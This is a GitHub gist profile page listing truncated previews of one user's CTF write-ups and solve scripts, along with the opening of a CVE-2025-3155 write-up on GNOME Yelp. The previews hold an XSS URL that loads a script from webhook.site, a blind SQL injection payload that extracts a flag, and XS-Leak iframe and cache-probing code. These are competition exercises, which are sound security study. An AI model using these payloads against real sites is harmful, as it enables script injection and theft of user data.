Skip to content

Instantly share code, notes, and snippets.

View parrot409's full-sized avatar
🏴
Maybe doing CTF?

parrot409 parrot409

🏴
Maybe doing CTF?
64 followers · 9 following
View GitHub Profile
@parrot409
parrot409 / _writeup.md
Created December 14, 2025 17:05
Impossible Leak - SECCON 2025 Quals

XS Leaks using disk cache grooming

The admin bot creates a new browsing context with createBrowsingContext() and uses that to create a page. Each browsing context should have a dedicated disk cache but how does chrome handle this? I deduced that it uses in-memory disk cache and it's much smaller than the default on-disk disk cache. The incognito tab of my browser has the same behavior.

The following page alerts "not cached" due to cache miss in incognito mode but no error happens in a regular tab.

$ head /dev/urandom -c 5242880 > chunk
$ cat <<EOF > index.html
@parrot409
parrot409 / alpaca-mark.md
Created May 17, 2025 09:09
AlpacaHack Round 11 solutions

Clobbering document.currentScript.

if (!e && t && (t.currentScript && "SCRIPT" === t.currentScript.tagName.toUpperCase() && (e = t.currentScript.src),

http://34.170.146.252:25903/?markdown=%3C/textarea%3E%3C/form%3E%3Cscript%20src=%22https://webhook.site/ec8dae46-b8ee-44a7-a4a8-d065f047ed60/%22%3E%3C/script%3E%3Cform%20name=%22currentScript%22%3E%3C/form%3E
@parrot409
parrot409 / writeup.md
Last active December 25, 2025 23:33
CVE-2025-3155

Details

Intro

CVE-2025-3155 affects Yelp which is The Gnome's user help application. It's installed by default on Ubuntu desktop.

what is a scheme

A URI scheme is the part of a Uniform Resource Identifier (URI) that identifies a protocol or a specific application (steam://run/1337) that should handle the resource identified by the URI. It's the part that comes before the colon (://).

@parrot409
parrot409 / doit.py
Created October 14, 2024 13:23
Blue Water CTF 2024 - bluesocial
#!/usr/bin/env python3
import requests
target = 'http://bluesocial.chal.perfect.blue:25005'
s = requests.session()
s.post(f'{target}/login',data={'username':'home'})
s.post(f'{target}/user/update',data={'bio':"""
<!DOCTYPE html>
<html lang='en'>
<head>
@parrot409
parrot409 / solve.html
Last active January 21, 2024 19:13
Gimme-Content-Type - mapna 2023
<a id=f >sdf</a>
<div id=t >
</div>
<script>
function addFrame(src,h){
let el = document.createElement('iframe')
el.src = src
el.onload = h
t.innerHTML = ''
@parrot409
parrot409 / README.md
Last active September 4, 2023 13:49
corctf 2023 - leakynote & pdfpal

Leaky note

The challenge:

404 page XSLeak SSLeak? challenge but the session cookie's samsite attribute is Lax. We have HTML injection in one of the pages but there is a csp.

Content-Security-Policy "script-src 'none'; object-src 'none'; frame-ancestors 'none';";
@parrot409
parrot409 / hack.html
Created October 30, 2022 21:37
food-api hack.lu ctf 2022
```html
<script>
const target = 'https://0.0.0.0/api/food/555??=`in()*?;select%20/*--%20%27&b%20%271*/%271%27from%20flag%20where%20randomblob((CASE%20WHEN%20(SUBSTR((SELECT%20flag%20FROM%20flag),IDX,1)%3d%27CHR%27)%20THEN%205000000%20ELSE%201%20END))--=dfdf'
const alphabet = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~ \t\n\r\x0b\x0c'
var flag = ''
async function atk(){
let tbl = []
for(let i=0;i<alphabet.length;i++){
@parrot409
parrot409 / wow.py
Created September 19, 2022 09:19
0ctf 2022 - jabasass
#!/usr/bin/env python3
# import requests_ as requests
# from requests_.auth import HTTPDigestAuth
# url = 'http://localhost:9990/management-upload'
# r = requests.post(url,headers={'Origin':'http://localhost:9990'},auth=HTTPDigestAuth('admin', 'admin'))
# print(r.text)
import _socket
import math
import hashlib
@parrot409
parrot409 / rem.php
Created December 27, 2021 17:09
SCTF 2021 - christmas-wishes
<?php
function conv($l){
$g = unpack("C*", pack("Q",$l));
$r = "";
for($i=0;$i<8;$i++){
if($g[$i] != 0){
$r.= chr($g[$i]);
}
}
return $r;
@parrot409
parrot409 / rem.html
Last active December 14, 2021 14:11
X-note writeup - SECCON CTF 2021
<html>
<head>
<title>rem rem rem</title>
</head>
<body>
<div id="atk">
</div>
<script>
// const TARGET = "http://localhost:8000"